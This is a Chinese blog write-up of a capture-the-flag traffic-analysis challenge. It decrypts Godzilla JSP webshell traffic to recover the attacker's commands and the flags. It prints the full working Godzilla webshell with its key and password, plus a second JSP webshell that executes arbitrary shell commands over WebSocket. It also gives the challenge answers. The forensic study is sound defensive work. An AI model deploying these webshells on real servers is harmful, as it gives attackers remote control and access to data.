2022某世赛选拔流量分析(jsp哥斯拉流量)

最新推荐文章于 2024-03-12 19:22:37 发布
最新推荐文章于 2024-03-12 19:22:37 发布
阅读量841 收藏 3
点赞数
文章标签: java python 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52365980/article/details/131505481
版权

获取密钥

流量包39上传了一个zip,解压出来有一个1.jsp

<%! String xc="3c6e0b8a9c15224a"; String pass="ctfisfun"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>

变量xc(密钥)作AES的密钥,密钥16字节,对应也就是AES128

变量pass(密码)作请求包的item的头部,如图:

后面有个MD5操作其实是计算了 pass+xc 的MD5

MD5(3c6e0b8a9c15224a) --> 49b3c226f3e5f760fd90ec52257b31ef

返回包:

"49b3c226f3e5f760" + AES128加密后base64编码内容 + "fd90ec52257b31ef"

下面是我随便找的一个返回包:
49B3C226F3E5F760LF/IpkPvM0iJI4wmpBs2DaoBVvcbDMpwuL7nYS3n/k4=FD90EC52257B31EF

如何解密

  1. 请求包解密,CyberChef 配方
URL_Decode()
From_Base64('A-Za-z0-9+/=',true,false)
AES_Decrypt({'option':'UTF8','string':'3c6e0b8a9c15224a'},{'option':'Hex','string':''},'ECB','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})
Gunzip()
  1. 返回包解密,CyberChef 配方

自己先手动删掉前16和后16的字符串

From_Base64('A-Za-z0-9+/=',true,false)
AES_Decrypt({'option':'UTF8','string':'3c6e0b8a9c15224a'},{'option':'Hex','string':''},'ECB','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})
Gunzip()

示例:

请求包130

返回包136

按照上面步骤解密出所有的密文:

120请求包
file 1.class 反编译 没啥用

122返回包
空


145请求包
fileName...../home/ctf/.bash_historymethodName.....readFile

147返回包
ls
openssl enc -e -aes256 -pass pass:"P@ssW0rd" -in flag.png -out encflag
ls
rm flag.png 
sudo ./bin/startup.sh 
history -w


156请求包
methodName.....getFiledirName.+.../home/ctf/Desktop/apache-tomcat-8.5.82/bin/

158返回包
ok
/home/ctf/Desktop/apache-tomcat-8.5.82/bin/
tool-wrapper.sh	1	2022-08-08 14:26:07	5540	RWX
setclasspath.sh	1	2022-08-08 14:26:07	3708	RWX
digest.bat	1	2022-08-08 14:26:07	2091	RW
digest.sh	1	2022-08-08 14:26:07	1965	RWX
commons-daemon-native.tar.gz	1	2022-08-08 14:26:07	211777	RW
tomcat-juli.jar	1	2022-08-08 14:26:07	51542	RW
catalina.bat	1	2022-08-08 14:26:07	16840	RW
tomcat-native.tar.gz	1	2022-08-08 14:26:07	436593	RW
ciphers.sh	1	2022-08-08 14:26:07	1997	RWX
shutdown.bat	1	2022-08-08 14:26:07	2020	RW
version.bat	1	2022-08-08 14:26:07	2026	RW
bootstrap.jar	1	2022-08-08 14:26:07	36191	RW
daemon.sh	1	2022-08-08 14:26:07	9100	RWX
version.sh	1	2022-08-08 14:26:07	1908	RWX
startup.sh	1	2022-08-08 14:26:07	1904	RWX
startup.bat	1	2022-08-08 14:26:07	2022	RW
commons-daemon.jar	1	2022-08-08 14:26:07	25410	RW
shutdown.sh	1	2022-08-08 14:26:07	1902	RWX
ciphers.bat	1	2022-08-08 14:26:07	2123	RW
setclasspath.bat	1	2022-08-08 14:26:07	3460	RW
configtest.sh	1	2022-08-08 14:26:07	1922	RWX
tool-wrapper.bat	1	2022-08-08 14:26:07	4574	RW
catalina.sh	1	2022-08-08 14:26:07	25294	RWX
configtest.bat	1	2022-08-08 14:26:07	2040	RW
catalina-tasks.xml	1	2022-08-08 14:26:07	1664	RW


161请求包
methodName.....getFiledirName.'.../home/ctf/Desktop/apache-tomcat-8.5.82/

163返回包
ok
/home/ctf/Desktop/apache-tomcat-8.5.82/
temp	0	2022-10-04 10:31:38	4096	RWX
NOTICE	1	2022-08-08 14:26:07	1726	RW
encflag	1	2022-10-04 11:56:12	1504	RW
bin	0	2022-08-08 14:26:07	4096	RWX
webapps	0	2022-10-04 11:57:28	4096	RWX
work	0	2022-10-04 10:05:08	4096	RWX
lib	0	2022-08-08 14:26:07	4096	RWX
LICENSE	1	2022-08-08 14:26:07	57011	RW
README.md	1	2022-08-08 14:26:07	3398	RW
BUILDING.txt	1	2022-08-08 14:26:07	19992	RW
logs	0	2022-10-04 10:05:08	4096	RWX
RUNNING.txt	1	2022-08-08 14:26:07	16505	RW
RELEASE-NOTES	1	2022-08-08 14:26:07	7139	RW
CONTRIBUTING.md	1	2022-08-08 14:26:07	6210	RW
conf	0	2022-10-04 10:05:08	4096	RWX


166请求包
methodName.....getFiledirName./.../home/ctf/Desktop/apache-tomcat-8.5.82/webapps/

168返回包
ok
/home/ctf/Desktop/apache-tomcat-8.5.82/webapps/
host-manager	0	2022-08-08 14:26:07	4096	RWX
1	0	2022-10-04 11:57:28	4096	RWX
docs	0	2022-08-08 14:26:07	4096	RWX
1.war	1	2022-10-04 11:57:28	1063	RW
examples	0	2022-08-08 14:26:07	4096	RWX
manager	0	2022-08-08 14:26:07	4096	RWX
ROOT	0	2022-08-08 14:26:07	4096	RWX


171请求包
methodName.....getFiledirName.1.../home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/

173返回包
ok
/home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/
META-INF	0	2022-10-04 11:57:28	4096	RWX
1.jsp	1	2022-10-03 11:30:15	2621	RW


183请求包
fileName.8.../home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/wbs.jspfileValue.Ä...<%@ page import="javax.websocket.server.ServerEndpointConfig" %>
<%@ page import="javax.websocket.server.ServerContainer" %>
<%@ page import="javax.websocket.*" %>
<%@ page import="java.io.*" %>

<%!
    public static class C extends Endpoint implements MessageHandler.Whole<String> {
        private Session session;
        @Override
        public void onMessage(String s) {
            try {
                Process process;
                boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
                if (bool) {
                    process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
                } else {
                    process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
                }
                InputStream inputStream = process.getInputStream();
                StringBuilder stringBuilder = new StringBuilder();
                int i;
                while ((i = inputStream.read()) != -1)
                    stringBuilder.append((char)i);
                inputStream.close();
                process.waitFor();
                session.getBasicRemote().sendText(stringBuilder.toString());
            } catch (Exception exception) {
                exception.printStackTrace();
            }
        }
        @Override
        public void onOpen(final Session session, EndpointConfig config) {
            this.session = session;
            session.addMessageHandler(this);
        }
    }
%>
<%
    String path = request.getParameter("path");
    ServletContext servletContext = request.getSession().getServletContext();
    ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(C.class, path).build();
    ServerContainer container = (ServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
    try {
        if (servletContext.getAttribute(path) == null){
            container.addEndpoint(configEndpoint);
            servletContext.setAttribute(path,path);
        }
        out.println("success, connect url path: " + servletContext.getContextPath() + path);
    } catch (Exception e) {
        out.println(e.toString());
    }
%>methodName.
...uploadFile

185返回包
ok


188请求包
methodName.....getFiledirName.1.../home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/

190返回包
ok
/home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/
META-INF	0	2022-10-04 11:57:28	4096	RWX
1.jsp	1	2022-10-03 11:30:15	2621	RW
wbs.jsp	1	2022-10-04 11:58:52	2244	RW


193请求包
cmdLine.f...bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswru" 2>&1arg-3.....2>&1executableFile.....bashexecutableArgs.a...-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswru" 2>&1arg-0.....bashargsCount.....4arg-1.....-carg-2.W...cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswrumethodName.....execCommand

195返回包
CYrXIi
/home/ctf/Desktop/apache-tomcat-8.5.82
rHswru


198请求包
cmdLine.=...bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";ls" 2>&1arg-3.....2>&1executableFile.....bashexecutableArgs.8...-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";ls" 2>&1arg-0.....bashargsCount.....4arg-1.....-carg-2.....cd "/home/ctf/Desktop/apache-tomcat-8.5.82";lsmethodName.....execCommand

200返回包
bin
BUILDING.txt
conf
CONTRIBUTING.md
encflag
lib
LICENSE
logs
NOTICE
README.md
RELEASE-NOTES
RUNNING.txt
temp
webapps
work


209请求包
cmdLine.O...bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64" 2>&1arg-3.....2>&1executableFile.....bashexecutableArgs.J...-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64" 2>&1arg-0.....bashargsCount.....4arg-1.....-carg-2.@...cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64methodName.....execCommand

212返回包
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
zr+rfY//7foF0uxdoBwucWBJqHuMHw==

1.请写出黑客第一次上传的木马的密码

1.jsp文件里面的pass变量就是密码

ctfisfun

2.请写出黑客第一次连接之后,给flag图片加密的密码

147返回包
ls
openssl enc -e -aes256 -pass pass:"P@ssW0rd" -in flag.png -out encflag
ls
rm flag.png 
sudo ./bin/startup.sh 
history -w

P@ssW0rd

3.请写出flag.png中flag内容,格式:flag{…}

encflag就是最后一个返回包的base64字符串

openssl base64 -d -aes256 -pass pass:P@ssW0rd -in encflag -out flag.png

flag{740afc12-43fe-11ed-b97f-00155d98d274}

4.请问黑客新建了一个用户,用户名是什么?

Hacker@12345

5.请写出最后输出的flag,格式:flag{…}

flag{45a61e64-434b-11ed-a260-00155d98bc46}
王八七七
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
kingkong:解密哥斯拉webshell管理工具流量
04-16
kingkong 解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员获取,这里以test.papng为例。 导出所有http对象,放置到文件夹 编辑kingkong.py脚本,找到#config这行,配置获取到的样本password、key,以及刚才的文件夹路径 py -2 kingkong.py Config #config #配置webshell的key key = '3c6e0b8a9c15224a' #配置webshell的password password = 'pass' #配置wireshark导出http对象的路径 filepath = '.' #配置是否为jsp+b
攻击工具分析:哥斯拉(Godzilla)1
08-03
通过Wireshark等网络抓包工具,可以捕获并分析哥斯拉的通信流量,以便了解其工作原理和解密过程。 综上所述,哥斯拉作为一款高级的Webshell管理工具,不仅具备强大的功能集,而且在加密和反检测方面表现出色,这...
解决哥斯拉内存马 pagecontext 的问题
hackzkaq的博客
04-25 1444
前言 注入内存马借助当前的webshell工具而言,冰蝎可以通过创建hashmap放入request、response、session替换pagecontext来解决 HttpSession session = lastRequest.getSession(); pageContext.put(“request”, lastRequest); pageContext.put(“response”, lastResponse); pageContext.put(“session”, session); 能这么
公司某应用服务器被挂挖矿病毒处理流程
weixin_41876359的博客
07-29 2482
公司某应用服务器被挂挖矿病毒处理流程 2021年7月20日 本来正在高高兴兴做项目,突然接到一个老客户的电话,跟我说他们的服务器被人植入了挖矿病毒,cpu爆满。 好家伙,客户上来给我发了个病毒扫描文件【听说是发现服务器卡顿后,安装了火绒企业版(收费)可以扫描linux主机,看来效果还不错,可以扫到很多东西】 看了下看服务器已经完全沦陷了 看了下情况,服务器目前已经是在自动连接矿池挖矿了。 1.关闭服务器连接外网的权限。 可以看到连接是从服务器主动连接到矿池的,首先关闭掉服务器连接外网的流量,不让服务
哥斯拉jsp马分析
zeros__的博客
12-27 6265
前言: 这篇文章分析了哥斯拉jsp马的特征原理,写这篇文章的原因是希望提高对哥斯拉马的识别、改造能力。 笔者接触安全的时间较短,难免会有疏漏,恳请发现问题的大佬给予指正。 哥斯拉PHP马解析可以看这篇文章: https://blog.csdn.net/zeros__/article/details/111521314 正文: 贴一下哥斯拉jsp马: < % !String xc = "3c6e0b8a9c15224a"; String pass = "pass"; String md5 = md
哥斯拉还原加密流量
热门推荐
u011250160的博客
09-28 1万+
感谢大佬的文章:哥斯拉Godzilla加密流量分析 首先在自己的网站上上传个马 设置好代理,方便burp抓包 注意以下为PHP_XOR_BASE64加密的数据包 一共抓到了三个包 第一个包 第二个包 第三个包 第一个包 Request解密脚本 <?php function encode($D,$K){ for($i=0;$i<strlen($D);$i++){ $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c;
哥斯拉4.0.1.rar
03-05
哥斯拉,好用的用后门软件
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
哥斯拉3.03.rar
08-12
webshell工具,哥斯拉
哥斯拉木马解析 + bypass 免杀代码分析+回调webshell
m0_64180167的博客
12-28 2145
这里也是跟着大佬走的这里首先我是去看了看bypass 学习一下然后我们就可以发现对比我这里将混淆什么的都去掉下面是原版的哥斯拉能发现 确实通过特殊的编码和对字符串的处理,实现bypass落地的时候确实火绒扫不出来我们将两种放到 阿里云中查看一下可以发现已经被识别到了(肯定是被抓特征了)这里我们首先就开始分析一下哥斯拉的php木马类别是 php xor base64这里是基本的代码查看 这里有些是我自己加上去进行判断的这里给出一下大致流程顺便给出session的解释。
cryptoghost:cryptoghost是用于解密或解码数据的脚本
04-11
隐鬼 Cryptoghost是由三个重要的库(来自bs4的请求,hashlib,beautifulsoup)创建的python脚本,cryptoghost支持解密/加密/编码/解码。 解密在cryptoghost中很重要,我制定了两种解密方法:方法1,蛮力我给脚本提供了10万个单词和密码列表,他逐行尝试输入一个单词,他比较了加密的单词= =用户哈希值。 输入方法2,他获取了一个用户哈希输入,并在名为hashtoolkit的站点中对其进行了解密。 就这样
python脚本实现查找webshell的方法
12-25
本文讲述了一个python查找 webshell脚本的代码,除了查找webshell功能之外还具有白名单功能,以及发现恶意代码发送邮件报警等功能,感兴趣的朋友可以自己测试一下看看效果。 具体的功能代码如下: #!/usr/bin/env python #-*- coding: utf-8 -*- import os import sys import re import smtplib #设定邮件 fromaddr = "smtp.qq.com" toaddrs = ["voilet@qq.com"] username = "voilet" password = "xxxxxx" #设置白名
首届“陇剑杯”网络安全大赛_wifi
weixin_72667582的博客
08-06 664
原题如下:网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木引进玩玩upload-labs ,并且保存了内存镜像、 wifi和服务器流量,让您来分析后作答:(本题仅1小问) 小王往upload-labs上传木马后进行了cat /flag,flag内容为__。
php商品查询,商品货号查询接口
weixin_33504929的博客
03-20 228
$url = "http://platform.okbuy.com/agent/agentapi/product";$paypwd = "b02a45a596bfb86fe2578bde75ff5444";$key = '3c6e0b8a9c15224a8228b9a98ca1531d';$Request = array('Brand'=>'匡威','Skus'=>array('169...
继承classLoader加载一个class文件demo
u014609356的专栏
01-22 814
public class Loader extends ClassLoader{ private String classPath; private String classname="Test"; public Loader(String classPath){ this.classPath=classPath; } @Override protected Class f
中间件漏洞(持续更新)
最新发布
qq_49714982的博客
03-12 893
cms:port defalut:7001 后台页面:http://ip:port/console弱口令或暴力破解进去后台。
陇剑杯之第九题WiFi之学习
shy的博客
09-29 1026
题目描述 网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量,让您来分析后作答:(本题仅1小问) 答题要求 小王往upload-labs上传木马后进行了cat /flag,flag内容为_____________。(压缩包里有解压密码的提示,需要额外添加花括号) 开始解题 1、解压题目给出的压缩包,发现一个镜像、两个流量包。 2、根据题目分析,小王往服务器上传了后门文件,并且读取了flag文件,题目要去我们.
【原创】利用动态二进制加密实现新型一句话木马之Java
weixin_34364071的博客
05-24 1112
概述 本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。 本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是: 利用动态二进制加密实现新型一句话木马之Java篇 利用动态二进制加密实现新型一句话木马之.net篇 利用动态二进制加密实现新型...
Java Class的热替换 自定义ClassLoader加载.class
z69183787的专栏
06-07 7788
本文是java热替换的实验,参考了 Java 类的热替换 —— 概念、设计与实现http://www.ibm.com/developerworks/cn/java/j-lo-hotswapcls/index.html 之前的错误是,没有集成ClassLoader,而是直接使用了 [java] view plaincopy classloade
哥斯拉工具通讯流量(jsp_raw)
09-04
哥斯拉工具通讯流量jsp_raw)是哥斯拉(Gozilla)安全工具的一种用于网络通信的流量类型。哥斯拉是一款用于网络安全测试和评估的开源工具,其目的是帮助系统管理员评估网络的安全性,发现网络中的漏洞和风险。 在网络安全测试中,通常需要模拟恶意攻击者的行为,以测试系统的抵御能力。哥斯拉工具则提供了各种类型的网络流量,其中包括了jsp_raw流量类型。 jsp_raw是一种特定的网络通信流量,用于测试JSPJava Server Pages)应用程序的安全性。JSP是一种动态网页技术,它使用Java代码嵌入在HTML中,可用于生成动态内容。然而,由于JSP可执行Java代码,系统可能面临各种安全风险,例如远程命令执行、代码注入、会话劫持等。 通过使用哥斯拉工具中的jsp_raw流量类型,系统管理员可以模拟恶意攻击者对JSP应用程序发起的各种攻击,以测试其安全性和鲁棒性。该流量类型可能包含了常见的攻击负载和恶意代码,例如尝试执行系统命令的代码、试图绕过输入验证的代码等。通过模拟这些攻击行为,系统管理员可以及时发现和修复潜在的漏洞,提高系统的安全性。 总之,哥斯拉工具的通讯流量类型之一,jsp_raw,用于模拟恶意攻击者对JSP应用程序的攻击,以评估其安全性和发现潜在的漏洞。它是网络安全测试中的重要工具,有助于保护系统免受潜在的安全威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王八七七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值